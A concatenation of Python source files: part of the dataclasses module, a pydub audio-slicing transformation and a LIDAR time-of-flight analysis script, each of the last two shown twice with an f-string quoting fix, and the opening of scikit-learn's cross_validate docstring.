hasattr(cls, _POST_INIT_NAME) _set_new_attribute(cls, '__init__', _init_fn(all_init_fields, std_init_fields, kw_only_init_fields, frozen, has_post_init, # The name to use for the "self" # param in __init__. Use "self" # if possible. '__dataclass_self__' if 'self' in fields else 'self', globals, )) # Get the fields as a list, and include only real fields. This is # used in all of the following methods. field_list = [f for f in fields.values() if f._field_type is _FIELD] if repr: flds = [f for f in field_list if f.repr] _set_new_attribute(cls, '__repr__', _repr_fn(flds, globals)) if eq: # Create __eq__ method. There's no need for a __ne__ method, # since python will call __eq__ and negate it. flds = [f for f in field_list if f.compare] self_tuple = _tuple_str('self', flds) other_tuple = _tuple_str('other', flds) _set_new_attribute(cls, '__eq__', _cmp_fn('__eq__', '==', self_tuple, other_tuple, globals=globals)) if order: # Create and set the ordering methods. flds = [f for f in field_list if f.compare] self_tuple = _tuple_str('self', flds) other_tuple = _tuple_str('other', flds) for name, op in [('__lt__', '<'), ('__le__', '<='), ('__gt__', '>'), ('__ge__', '>='), ]: if _set_new_attribute(cls, name, _cmp_fn(name, op, self_tuple, other_tuple, globals=globals)): raise TypeError(f'Cannot overwrite attribute {name} ' f'in class {cls.__name__}. Consider using ' 'functools.total_ordering') if frozen: for fn in _frozen_get_del_attr(cls, field_list, globals): if _set_new_attribute(cls, fn.__name__, fn): raise TypeError(f'Cannot overwrite attribute {fn.__name__} ' f'in class {cls.__name__}') # Decide if/how we're going to create a hash function. hash_action = _hash_action[bool(unsafe_hash), bool(eq), bool(frozen), has_explicit_hash] if hash_action: # No need to call _set_new_attribute here, since by the time # we're here the overwriting is unconditional. cls.__hash__ = hash_action(cls, field_list, globals) if not getattr(cls, '__doc__'): # Create a class doc-string. cls.__doc__ = (cls.__name__ + str(inspect.signature(cls)).replace(' -> None', '')) if match_args: # I could probably compute this once _set_new_attribute(cls, '__match_args__', tuple(f.name for f in std_init_fields)) if slots: cls = _add_slots(cls, frozen) abc.update_abstractmethods(cls) return cls # _dataclass_getstate and _dataclass_setstate are needed for pickling frozen # classes with slots. These could be slighly more performant if we generated # the code instead of iterating over fields. But that can be a project for # another day, if performance becomes an issue. def _dataclass_getstate(self): return [getattr(self, f.name) for f in fields(self)] def _dataclass_setstate(self, state): for field, value in zip(fields(self), state): # use setattr because dataclass may be frozen object.__setattr__(self, field.name, value) def _add_slots(cls, is_frozen): # Need to create a new class, since we can't set __slots__ # after a class has been created. # Make sure __slots__ isn't already set. if '__slots__' in cls.__dict__: raise TypeError(f'{cls.__name__} already specifies __slots__') # Create a new dict for our new class. cls_dict = dict(cls.__dict__) field_names = tuple(f.name for f in fields(cls)) cls_dict['__slots__'] = field_names for field_name in field_names: # Remove our attributes, if present. They'll still be # available in _MARKER. cls_dict.pop(field_name, None) # Remove __dict__ itself. cls_dict.pop('__dict__', None) # And finally create the class. qualname = getattr(cls, '__qualname__', None) cls = type(cls)(cls.__name__, cls.__bases__, cls_dict) if qualname is not None: cls.__qualname__ = qualname if is_frozen: # Need this for pickling frozen classes with slots. cls.__getstate__ = _dataclass_getstate cls.__setstate__ = _dataclass_setstate return cls def dataclass(cls=None, /, *, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False, match_args=True, kw_only=False, slots=False): """Returns the same class as was passed in, with dunder methods added based on the fields defined in the class. Examines PEP 526 __annotations__ to determine fields. If init is true, an __init__() method is added to the class. If repr is true, a __repr__() method is added. If order is true, rich comparison dunder methods are added. If unsafe_hash is true, a __hash__() method function is added. If frozen is true, fields may not be assigned to after instance creation. If match_args is true, the __match_args__ tuple is added. If kw_only is true, then by default all fields are keyword-only. If slots is true, an __slots__ attribute is added. """ def wrap(cls): return _process_class(cls, init, repr, eq, order, unsafe_hash, frozen, match_args, kw_only, slots) # See if we're being called as @dataclass or @dataclass(). if cls is None: # We're called with parens. return wrap # We're called as @dataclass without parens. return wrap(cls) def fields(class_or_instance): """Return a tuple describing the fields of this dataclass. Accepts a dataclass or an instance of one. Tuple elements are of type Field. """ # Might it be worth caching this, per class? try: fields = getattr(class_or_instance, _FIELDS) except AttributeError: raise TypeError('must be called with a dataclass type or instance') # Exclude pseudo-fields. Note that fields is sorted by insertion # order, so the order of the tuple is as the fields were defined. return tuple(f for f in fields.values() if f._field_type is _FIELD) def _is_dataclass_instance(obj): """Returns True if obj is an instance of a dataclass.""" return hasattr(type(obj), _FIELDS) def is_dataclass(obj): """Returns True if obj is a dataclass or an instance of a dataclass.""" cls = obj if isinstance(obj, type) else type(obj) return hasattr(cls, _FIELDS) def asdict(obj, *, dict_factory=dict): """Return the fields of a dataclass instance as a new dictionary mapping field names to field values. Example usage: @dataclass class C: x: int y: int c = C(1, 2) assert asdict(c) == {'x': 1, 'y': 2} If given, 'dict_factory' will be used instead of built-in dict. The function applies recursively to field values that are dataclass instances. This will also look into built-in containers: tuples, lists, and dicts. """ if not _is_dataclass_instance(obj): raise TypeError("asdict() should be called on dataclass instances") return _asdict_inner(obj, dict_factory) def _asdict_inner(obj, dict_factory): if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _asdict_inner(getattr(obj, f.name), dict_factory) result.append((f.name, value)) return dict_factory(result) elif isinstance(obj, tuple) and hasattr(obj, '_fields'): # obj is a namedtuple. Recurse into it, but the returned # object is another namedtuple of the same type. This is # similar to how other list- or tuple-derived classes are # treated (see below), but we just need to create them # differently because a namedtuple's __init__ needs to be # called differently (see bpo-34363). # I'm not using namedtuple's _asdict() # method, because: # - it does not recurse in to the namedtuple fields and # convert them to dicts (using dict_factory). # - I don't actually want to return a dict here. The main # use case here is json.dumps, and it handles converting # namedtuples to lists. Admittedly we're losing some # information here when we produce a json list instead of a # dict. Note that if we returned dicts here instead of # namedtuples, we could no longer call asdict() on a data # structure where a namedtuple was used as a dict key. return type(obj)(*[_asdict_inner(v, dict_factory) for v in obj]) elif isinstance(obj, (list, tuple)): # Assume we can create an object of this type by passing in a # generator (which is not true for namedtuples, handled # above). return type(obj)(_asdict_inner(v, dict_factory) for v in obj) elif isinstance(obj, dict): return type(obj)((_asdict_inner(k, dict_factory), _asdict_inner(v, dict_factory)) for k, v in obj.items()) else: return copy.deepcopy(obj) def astuple(obj, *, tuple_factory=tuple): """Return the fields of a dataclass instance as a new tuple of field values. Example usage:: @dataclass class C: x: int y: int c = C(1, 2) assert astuple(c) == (1, 2) If given, 'tuple_factory' will be used instead of built-in tuple. The function applies recursively to field values that are dataclass instances. This will also look into built-in containers: tuples, lists, and dicts. """ if not _is_dataclass_instance(obj): raise TypeError("astuple() should be called on dataclass instances") return _astuple_inner(obj, tuple_factory) def _astuple_inner(obj, tuple_factory): if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _astuple_inner(getattr(obj, f.name), tuple_factory) result.append(value) return tuple_factory(result) elif isinstance(obj, tuple) and hasattr(obj, '_fields'): # obj is a namedtuple. Recurse into it, but the returned # object is another namedtuple of the same type. This is # similar to how other list- or tuple-derived classes are # treated (see below), but we just need to create them # differently because a namedtuple's __init__ needs to be # called differently (see bpo-34363). return type(obj)(*[_astuple_inner(v, tuple_factory) for v in obj]) elif isinstance(obj, (list, tuple)): # Assume we can create an object of this type by passing in a # generator (which is not true for namedtuples, handled # above). return type(obj)(_astuple_inner(v, tuple_factory) for v in obj) elif isinstance(obj, dict): return type(obj)((_astuple_inner(k, tuple_factory), _astuple_inner(v, tuple_factory)) for k, v in obj.items()) else: return copy.deepcopy(obj) def make_dataclass(cls_name, fields, *, bases=(), namespace=None, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False, match_args=True, slots=False): """Return a new dynamically created dataclass. The dataclass name will be 'cls_name'. 'fields' is an iterable of either (name), (name, type) or (name, type, Field) objects. If type is omitted, use the string 'typing.Any'. Field objects are created by the equivalent of calling 'field(name, type [, Field-info])'. C = make_dataclass('C', ['x', ('y', int), ('z', int, field(init=False))], bases=(Base,)) is equivalent to: @dataclass class C(Base): x: 'typing.Any' y: int z: int = field(init=False) For the bases and namespace parameters, see the builtin type() function. The parameters init, repr, eq, order, unsafe_hash, and frozen are passed to dataclass(). """ if namespace is None: namespace = {} # While we're looking through the field names, validate that they # are identifiers, are not keywords, and not duplicates. seen = set() annotations = {} defaults = {} for item in fields: if isinstance(item, str): name = item tp = 'typing.Any' elif len(item) == 2: name, tp, = item elif len(item) == 3: name, tp, spec = item defaults[name] = spec else: raise TypeError(f'Invalid field: {item!r}') if not isinstance(name, str) or not name.isidentifier(): raise TypeError(f'Field names must be valid identifiers: {name!r}') if keyword.iskeyword(name): raise TypeError(f'Field names must not be keywords: {name!r}') if name in seen: raise TypeError(f'Field name duplicated: {name!r}') seen.add(name) annotations[name] = tp # Update 'ns' with the user-supplied namespace plus our calculated values. def exec_body_callback(ns): ns.update(namespace) ns.update(defaults) ns['__annotations__'] = annotations # We use `types.new_class()` instead of simply `type()` to allow dynamic creation # of generic dataclassses. cls = types.new_class(cls_name, bases, {}, exec_body_callback) # Apply the normal decorator. return dataclass(cls, init=init, repr=repr, eq=eq, order=order, unsafe_hash=unsafe_hash, frozen=frozen, match_args=match_args, slots=slots) def replace(obj, /, **changes): """Return a new object replacing specified fields with new values. This is especially useful for frozen classes. Example usage: @dataclass(frozen=True) class C: x: int y: int c = C(1, 2) c1 = replace(c, x=3) assert c1.x == 3 and c1.y == 2 """ # We're going to mutate 'changes', but that's okay because it's a # new dict, even if called with 'replace(obj, **my_changes)'. if not _is_dataclass_instance(obj): raise TypeError("replace() should be called on dataclass instances") # It's an error to have init=False fields in 'changes'. # If a field is not in 'changes', read its value from the provided obj. for f in getattr(obj, _FIELDS).values(): # Only consider normal fields or InitVars. if f._field_type is _FIELD_CLASSVAR: continue if not f.init: # Error if this field is specified in changes. if f.name in changes: raise ValueError(f'field {f.name} is declared with ' 'init=False, it cannot be specified with ' 'replace()') continue if f.name not in changes: if f._field_type is _FIELD_INITVAR and f.default is MISSING: raise ValueError(f"InitVar {f.name!r} " 'must be specified with replace()') changes[f.name] = getattr(obj, f.name) # Create the new object, which calls __init__() and # __post_init__() (if defined), using all of the init fields we've # added and/or left in 'changes'. If there are values supplied in # changes that aren't fields, this will correctly raise a # TypeError. return obj.__class__(**changes)
from dataclasses import dataclass from typing import Optional from pydub import AudioSegment from cyberpunk.exceptions import ( TransformationInputParseException, TransformationProcessException, ) from cyberpunk.transformations import TransformationInput @dataclass class SliceInput: start: Optional[int] end: Optional[int] @classmethod def from_str(cls, arg: str): try: start_str, end_str = tuple(arg.split(":")) start = int(start_str) if start_str != "" else None end = int(end_str) if end_str != "" else None except Exception as e: raise TransformationInputParseException(e) else: return SliceInput( start=start, end=end, ) def __iter__(self): yield "start", self.start yield "end", self.end def __str__(self): return f"{self.start if self.start is not None else ""}:{self.end if self.end is not None else ""}" class Slice: def __call__( self, segment: AudioSegment, inputs: TransformationInput, ) -> AudioSegment: return self.run(segment, inputs) def run( self, segment: AudioSegment, inputs: TransformationInput, ) -> AudioSegment: try: assert isinstance(inputs, SliceInput) start = inputs.start end = inputs.end if start is None and end is None: raise TransformationProcessException( "the start and end of a slice can't both be None", ) if start is None: sliced_segment = segment[:end] elif end is None: sliced_segment = segment[start:] else: sliced_segment = segment[start:end] except Exception as e: raise TransformationProcessException(e) else: return sliced_segment
from dataclasses import dataclass from typing import Optional from pydub import AudioSegment from cyberpunk.exceptions import ( TransformationInputParseException, TransformationProcessException, ) from cyberpunk.transformations import TransformationInput @dataclass class SliceInput: start: Optional[int] end: Optional[int] @classmethod def from_str(cls, arg: str): try: start_str, end_str = tuple(arg.split(":")) start = int(start_str) if start_str != "" else None end = int(end_str) if end_str != "" else None except Exception as e: raise TransformationInputParseException(e) else: return SliceInput( start=start, end=end, ) def __iter__(self): yield "start", self.start yield "end", self.end def __str__(self): return f"{self.start if self.start is not None else ''}:{self.end if self.end is not None else ''}" class Slice: def __call__( self, segment: AudioSegment, inputs: TransformationInput, ) -> AudioSegment: return self.run(segment, inputs) def run( self, segment: AudioSegment, inputs: TransformationInput, ) -> AudioSegment: try: assert isinstance(inputs, SliceInput) start = inputs.start end = inputs.end if start is None and end is None: raise TransformationProcessException( "the start and end of a slice can't both be None", ) if start is None: sliced_segment = segment[:end] elif end is None: sliced_segment = segment[start:] else: sliced_segment = segment[start:end] except Exception as e: raise TransformationProcessException(e) else: return sliced_segment
#------IMPORTS----- #Packages for ETA backend import json import etabackend.eta #Available at: https://github.com/timetag/ETA, https://eta.readthedocs.io/en/latest/ import etabackend.tk as etatk #Packages used for analysis import numpy as np from pathlib import Path import os import time as t import LIDAR_lib as lidar #Contains functions for 3D analysis import intensity_map def ToF_analysis(timetag_file, recipe_file, ch_sel, **kwargs): load_start = t.time() #Load the recipe from seperate ETA file with open(recipe_file, 'r') as filehandle: recipe_obj = json.load(filehandle) eta_engine = etabackend.eta.ETA() eta_engine.load_recipe(recipe_obj) #Set parameters in the recipe for arg in kwargs: eta_engine.recipe.set_parameter(arg, str(kwargs[arg])) """ eta_engine.recipe.set_parameter("binsize", str(binsize)) eta_engine.recipe.set_parameter("bins", str(bins)) eta_engine.recipe.set_parameter("sync_delay", str(sync_delay)) eta_engine.recipe.set_parameter("dimX", str(dimX)) eta_engine.recipe.set_parameter("dimX", str(dimY)) """ eta_engine.load_recipe() load_time = t.time() - load_start #---File handling--- file = Path(timetag_file) #------ETA PROCESSING----- START = t.time() """ Code block loads the time-tagging data and runs the ETA script to genereate ToF histograms """ TOF_anal_start = t.time() print("Starting TOF analysis") cutfile = eta_engine.clips(file) result = eta_engine.run({"timetagger1":cutfile}, group='quTAG') #Runs the time tagging analysis and generates histograms histogram=result[ch_sel] #Selects the intended output from ETA, in this case it returns a 2-d array. The y axis for all ToF histograms. X axis must be recreated seperatly TOF_anal_time = t.time() - TOF_anal_start print(f"Number of histograms produced: {result["pixelnumber"]+1}") return histogram, START, load_time, TOF_anal_time #--------------- Analysing the ToF histograms ----------- #--------------- Analysing the ToF histograms ----------- def analyse_3d(histogram, index_cutoff, index_ref, x_deg, y_deg, time, method = 'peak', background = 6, delay = 0): METHODS = {'peak': lidar.peak_distance, 'gauss': lidar.gauss} anal = METHODS[method] print("Starting 3D analysis") d_data = {} #used to store the distance data i_data = {} average_peak = 0 #some fun values to keep track of average_failed_peak = 0 #some fun values to keep track of F = 0 #Used to keep track of the number of failed pixels start = t.time() #Evaluate the time efficiency of the algorithms """ Code block loops through all histograms. Removes background/internal reflections and calculates the distance to a reference value that must be measured separately (but is reused for all scans) """ dimX = len(x_deg) dimY = len(y_deg) for i in range(0,dimY): print(i,"/",dimY) for j in range(0,dimX): h = histogram[j][i] #h = ToF_histogram_offset(h,delay, binsize) h[:index_cutoff] = 0 #Cuts away the internal reflections, background_cutoff is assigned in ETA frontend and is based on a background measurement. peak = np.amax(h) #Identifies the target peak if peak > background: #removes pixels with only noise, noise threshold can be modified #d, _ = lidar.skewedgauss(time,h,index_ref) #Gaussian algorithm #d, _ = lidar.gauss(time,h,index_ref) #Gaussian algorithm #d = lidar.peak_distance(time,h, index_ref)#d = lidar.getDistance(index_ref, h, binsize = binsize) #Peak finding Algorithm d, h = anal(time, h, index_ref) if d != np.NaN: #Gaussian algorithm can return np.NaN if unable to fit a curve to data, very unlikely after filtering away peaks with. It's a relic and might be obselete (but it's not hurting anyone) x,y,z = lidar.XYZ(np.abs(d),x_deg[i],y_deg[j]) d_data[(x,y)] = z i_data[(x,y)] = h average_peak += peak else: x,y,z = lidar.XYZ(1,x_deg[i],y_deg[j]) #x,y,z, = np.NaN, np.NaN, np.NaN d_data[(x,y)] = np.NaN i_data[(x,y)] = np.NaN F +=1 average_failed_peak += peak stop = t.time() print("Failed pixels: ", F) print("Average peak: ", average_peak/(dimY*dimX - F)) if F!=0: print("Average failed peak: ", average_failed_peak/F) print("3D analysis time: ", stop-start) return d_data, i_data def main(): """Set Parameters for analysis and plotting""" recipe = "C:/Users/staff/Documents/Lidar LF/ETA_recipes/quTAG_LiDAR_1.2.eta" #ETA_recipe file #.timeres file to analysed file = 'C:/Users/staff/Documents/Lidar LF/Data/220216/Fredrik_10.0ms_300kHz_-17.9uA_[4, 9, -5, -4.5]_200x200_220216.timeres' anal_method = "peak" #Parameters for etabackend to generate histograms base_binsize = 16 #Histogram binsize in ps base_bins = 6250 #Number of bins in the histogram: bins*binsize should equal 1/f where f is the repition rate of the laser in use ch_sel = 't1' #Selects a specific histogram records_per_cut = 2e5 #Number of events to be used per evalution cycle in ETA, not important in this code #Time offsets for different signals [ps] base_sync_delay = 0 #40000 #All events of the sync channel is delayed by 40000 ps (not necessary) base_delay = 10560 #16800 # base_dimX = 200 # number of steps in the scan steps == resolution base_dimY = 200 histogram, START, load_time, TOF_anal_time = ToF_analysis(file, recipe, ch_sel, bins = base_bins, binsize=base_binsize, dimX=base_dimX, dimY=base_dimY, sync_delay = base_sync_delay) time = (np.arange(0,base_bins)*base_binsize) #Recreate time axis #----------------- Variables --------------------- #Scanning variables rect = [4, 9, -5, -4.5] #Voltage range of scan, linear to angle x_deg, y_deg = lidar.angles(rect,base_dimX,base_dimY) #Analysis parameters index_cutoff = 4520 #5220 #Removes the background noise. This value depends on the specifics of the setup and the delays. Must be optimised for new setups index_ref = 4500 #5150 #Time index of the mirrors position, used as origin when calculating 3D point clouds. Not at zero because the laser must first travel to the optical setup. Mus be measured seperatly #Plotting parameters coff = 4 #Removes outliers for plotting purposes. Simply to avoid squished plots z_rot = 270 #Angle of wiev in 3D plot x_rot = 20 ##lidar.save_pixel_array(histogram, file, dimX, dimY, binsize) #To save some raw data for troubleshooting #lidar.save_all_pixels(histogram, file, dimX, dimY, binsize) d_data, i_data = analyse_3d(histogram, index_cutoff, index_ref, x_deg, y_deg, time, method = anal_method, background = 6, delay = base_delay) file = Path(file) print("Loading time: ", load_time) print("TOF analysis time: ", TOF_anal_time) print("Total Analysis time: ", t.time()-START) print(f"Length of d_data: {len(d_data)}| i_data: {len(i_data)}") #-------------------- Save code ------------- print("Saving Images") coff = int(coff) # prevents the images from being to squished intensity_map.heatmap(i_data) #lidar.scatter(d_data, file, cutoff = coff, name = anal_method + "_Fit_", show = True)#, ylim = (300,600), xlim=(-200,200)) #lidar.save_data(d_data, file, anal_method + '_') print("Job Done!") if __name__ == '__main__': main()
#------IMPORTS----- #Packages for ETA backend import json import etabackend.eta #Available at: https://github.com/timetag/ETA, https://eta.readthedocs.io/en/latest/ import etabackend.tk as etatk #Packages used for analysis import numpy as np from pathlib import Path import os import time as t import LIDAR_lib as lidar #Contains functions for 3D analysis import intensity_map def ToF_analysis(timetag_file, recipe_file, ch_sel, **kwargs): load_start = t.time() #Load the recipe from seperate ETA file with open(recipe_file, 'r') as filehandle: recipe_obj = json.load(filehandle) eta_engine = etabackend.eta.ETA() eta_engine.load_recipe(recipe_obj) #Set parameters in the recipe for arg in kwargs: eta_engine.recipe.set_parameter(arg, str(kwargs[arg])) """ eta_engine.recipe.set_parameter("binsize", str(binsize)) eta_engine.recipe.set_parameter("bins", str(bins)) eta_engine.recipe.set_parameter("sync_delay", str(sync_delay)) eta_engine.recipe.set_parameter("dimX", str(dimX)) eta_engine.recipe.set_parameter("dimX", str(dimY)) """ eta_engine.load_recipe() load_time = t.time() - load_start #---File handling--- file = Path(timetag_file) #------ETA PROCESSING----- START = t.time() """ Code block loads the time-tagging data and runs the ETA script to genereate ToF histograms """ TOF_anal_start = t.time() print("Starting TOF analysis") cutfile = eta_engine.clips(file) result = eta_engine.run({"timetagger1":cutfile}, group='quTAG') #Runs the time tagging analysis and generates histograms histogram=result[ch_sel] #Selects the intended output from ETA, in this case it returns a 2-d array. The y axis for all ToF histograms. X axis must be recreated seperatly TOF_anal_time = t.time() - TOF_anal_start print(f"Number of histograms produced: {result['pixelnumber']+1}") return histogram, START, load_time, TOF_anal_time #--------------- Analysing the ToF histograms ----------- #--------------- Analysing the ToF histograms ----------- def analyse_3d(histogram, index_cutoff, index_ref, x_deg, y_deg, time, method = 'peak', background = 6, delay = 0): METHODS = {'peak': lidar.peak_distance, 'gauss': lidar.gauss} anal = METHODS[method] print("Starting 3D analysis") d_data = {} #used to store the distance data i_data = {} average_peak = 0 #some fun values to keep track of average_failed_peak = 0 #some fun values to keep track of F = 0 #Used to keep track of the number of failed pixels start = t.time() #Evaluate the time efficiency of the algorithms """ Code block loops through all histograms. Removes background/internal reflections and calculates the distance to a reference value that must be measured separately (but is reused for all scans) """ dimX = len(x_deg) dimY = len(y_deg) for i in range(0,dimY): print(i,"/",dimY) for j in range(0,dimX): h = histogram[j][i] #h = ToF_histogram_offset(h,delay, binsize) h[:index_cutoff] = 0 #Cuts away the internal reflections, background_cutoff is assigned in ETA frontend and is based on a background measurement. peak = np.amax(h) #Identifies the target peak if peak > background: #removes pixels with only noise, noise threshold can be modified #d, _ = lidar.skewedgauss(time,h,index_ref) #Gaussian algorithm #d, _ = lidar.gauss(time,h,index_ref) #Gaussian algorithm #d = lidar.peak_distance(time,h, index_ref)#d = lidar.getDistance(index_ref, h, binsize = binsize) #Peak finding Algorithm d, h = anal(time, h, index_ref) if d != np.NaN: #Gaussian algorithm can return np.NaN if unable to fit a curve to data, very unlikely after filtering away peaks with. It's a relic and might be obselete (but it's not hurting anyone) x,y,z = lidar.XYZ(np.abs(d),x_deg[i],y_deg[j]) d_data[(x,y)] = z i_data[(x,y)] = h average_peak += peak else: x,y,z = lidar.XYZ(1,x_deg[i],y_deg[j]) #x,y,z, = np.NaN, np.NaN, np.NaN d_data[(x,y)] = np.NaN i_data[(x,y)] = np.NaN F +=1 average_failed_peak += peak stop = t.time() print("Failed pixels: ", F) print("Average peak: ", average_peak/(dimY*dimX - F)) if F!=0: print("Average failed peak: ", average_failed_peak/F) print("3D analysis time: ", stop-start) return d_data, i_data def main(): """Set Parameters for analysis and plotting""" recipe = "C:/Users/staff/Documents/Lidar LF/ETA_recipes/quTAG_LiDAR_1.2.eta" #ETA_recipe file #.timeres file to analysed file = 'C:/Users/staff/Documents/Lidar LF/Data/220216/Fredrik_10.0ms_300kHz_-17.9uA_[4, 9, -5, -4.5]_200x200_220216.timeres' anal_method = "peak" #Parameters for etabackend to generate histograms base_binsize = 16 #Histogram binsize in ps base_bins = 6250 #Number of bins in the histogram: bins*binsize should equal 1/f where f is the repition rate of the laser in use ch_sel = 't1' #Selects a specific histogram records_per_cut = 2e5 #Number of events to be used per evalution cycle in ETA, not important in this code #Time offsets for different signals [ps] base_sync_delay = 0 #40000 #All events of the sync channel is delayed by 40000 ps (not necessary) base_delay = 10560 #16800 # base_dimX = 200 # number of steps in the scan steps == resolution base_dimY = 200 histogram, START, load_time, TOF_anal_time = ToF_analysis(file, recipe, ch_sel, bins = base_bins, binsize=base_binsize, dimX=base_dimX, dimY=base_dimY, sync_delay = base_sync_delay) time = (np.arange(0,base_bins)*base_binsize) #Recreate time axis #----------------- Variables --------------------- #Scanning variables rect = [4, 9, -5, -4.5] #Voltage range of scan, linear to angle x_deg, y_deg = lidar.angles(rect,base_dimX,base_dimY) #Analysis parameters index_cutoff = 4520 #5220 #Removes the background noise. This value depends on the specifics of the setup and the delays. Must be optimised for new setups index_ref = 4500 #5150 #Time index of the mirrors position, used as origin when calculating 3D point clouds. Not at zero because the laser must first travel to the optical setup. Mus be measured seperatly #Plotting parameters coff = 4 #Removes outliers for plotting purposes. Simply to avoid squished plots z_rot = 270 #Angle of wiev in 3D plot x_rot = 20 ##lidar.save_pixel_array(histogram, file, dimX, dimY, binsize) #To save some raw data for troubleshooting #lidar.save_all_pixels(histogram, file, dimX, dimY, binsize) d_data, i_data = analyse_3d(histogram, index_cutoff, index_ref, x_deg, y_deg, time, method = anal_method, background = 6, delay = base_delay) file = Path(file) print("Loading time: ", load_time) print("TOF analysis time: ", TOF_anal_time) print("Total Analysis time: ", t.time()-START) print(f"Length of d_data: {len(d_data)}| i_data: {len(i_data)}") #-------------------- Save code ------------- print("Saving Images") coff = int(coff) # prevents the images from being to squished intensity_map.heatmap(i_data) #lidar.scatter(d_data, file, cutoff = coff, name = anal_method + "_Fit_", show = True)#, ylim = (300,600), xlim=(-200,200)) #lidar.save_data(d_data, file, anal_method + '_') print("Job Done!") if __name__ == '__main__': main()
""" The :mod:`sklearn.model_selection._validation` module includes classes and functions to validate the model. """ # Author: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Gael Varoquaux <gael.varoquaux@normalesup.org> # Olivier Grisel <olivier.grisel@ensta.org> # Raghav RV <rvraghav93@gmail.com> # License: BSD 3 clause import warnings import numbers import time from traceback import format_exc from contextlib import suppress import numpy as np import scipy.sparse as sp from joblib import Parallel, logger from ..base import is_classifier, clone from ..utils import indexable, check_random_state, _safe_indexing from ..utils.validation import _check_fit_params from ..utils.validation import _num_samples from ..utils.validation import _deprecate_positional_args from ..utils.fixes import delayed from ..utils.metaestimators import _safe_split from ..metrics import check_scoring from ..metrics._scorer import _check_multimetric_scoring, _MultimetricScorer from ..exceptions import FitFailedWarning, NotFittedError from ._split import check_cv from ..preprocessing import LabelEncoder __all__ = ['cross_validate', 'cross_val_score', 'cross_val_predict', 'permutation_test_score', 'learning_curve', 'validation_curve'] @_deprecate_positional_args def cross_validate(estimator, X, y=None, *, groups=None, scoring=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', return_train_score=False, return_estimator=False, error_score=np.nan): """Evaluate metric(s) by cross-validation and also record fit/score times. Read more in the :ref:`User Guide <multimetric_cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be for example a list, or an array. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). scoring : str, callable, list, tuple, or dict, default=None Strategy to evaluate the performance of the cross-validated model on the test set. If `scoring` represents a single score, one can use: - a single string (see :ref:`scoring_parameter`); - a callable (see :ref:`scoring`) that returns a single value. If `scoring` reprents multiple scores, one can use: - a list or tuple of unique strings; - a callable returning a dictionary where the keys are the metric names and the values are the metric scores; - a dictionary with metric names as keys and callables a values. See :ref:`multimetric_grid_search` for an example. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' return_train_score : bool, default=False Whether to include train scores. Computing training scores is used to get insights on how different parameter settings impact the overfitting/underfitting trade-off. However computing the scores on the training set can be computationally expensive and is not strictly required to select the parameters that yield the best generalization performance. .. versionadded:: 0.19 .. versionchanged:: 0.21 Default value was changed from ``True`` to ``False`` return_estimator : bool, default=False Whether to return the estimators fitted on each split. .. versionadded:: 0.20 error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- scores : dict of float arrays of shape (n_splits,) Array of scores of the estimator for each run of the cross validation. A dict of arrays containing the score/time arrays for each scorer is returned. The possible keys for this ``dict`` are: ``test_score`` The score array for test scores on each cv split. Suffix ``_score`` in ``test_score`` changes to a specific metric like ``test_r2`` or ``test_auc`` if there are multiple scoring metrics in the scoring parameter. ``train_score`` The score array for train scores on each cv split. Suffix ``_score`` in ``train_score`` changes to a specific metric like ``train_r2`` or ``train_auc`` if there are multiple scoring metrics in the scoring parameter. This is available only if ``return_train_score`` parameter is ``True``. ``fit_time`` The time for fitting the estimator on the train set for each cv split. ``score_time`` The time for scoring the estimator on the test set for each cv split. (Note time for scoring on the train set is not included even if ``return_train_score`` is set to ``True`` ``estimator`` The estimator objects for each cv split. This is available only if ``return_estimator`` parameter is set to ``True``. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_validate >>> from sklearn.metrics import make_scorer >>> from sklearn.metrics import confusion_matrix >>> from sklearn.svm import LinearSVC >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() Single metric evaluation using ``cross_validate`` >>> cv_results = cross_validate(lasso, X, y, cv=3) >>> sorted(cv_results.keys()) ['fit_time', 'score_time', 'test_score'] >>> cv_results['test_score'] array([0.33150734, 0.08022311, 0.03531764]) Multiple metric evaluation using ``cross_validate`` (please refer the ``scoring`` parameter doc for more information) >>> scores = cross_validate(lasso, X, y, cv=3, ... scoring=('r2', 'neg_mean_squared_error'), ... return_train_score=True) >>> print(scores['test_neg_mean_squared_error']) [-3635.5... -3573.3... -6114.7...] >>> print(scores['train_r2']) [0.28010158 0.39088426 0.22784852] See Also --------- 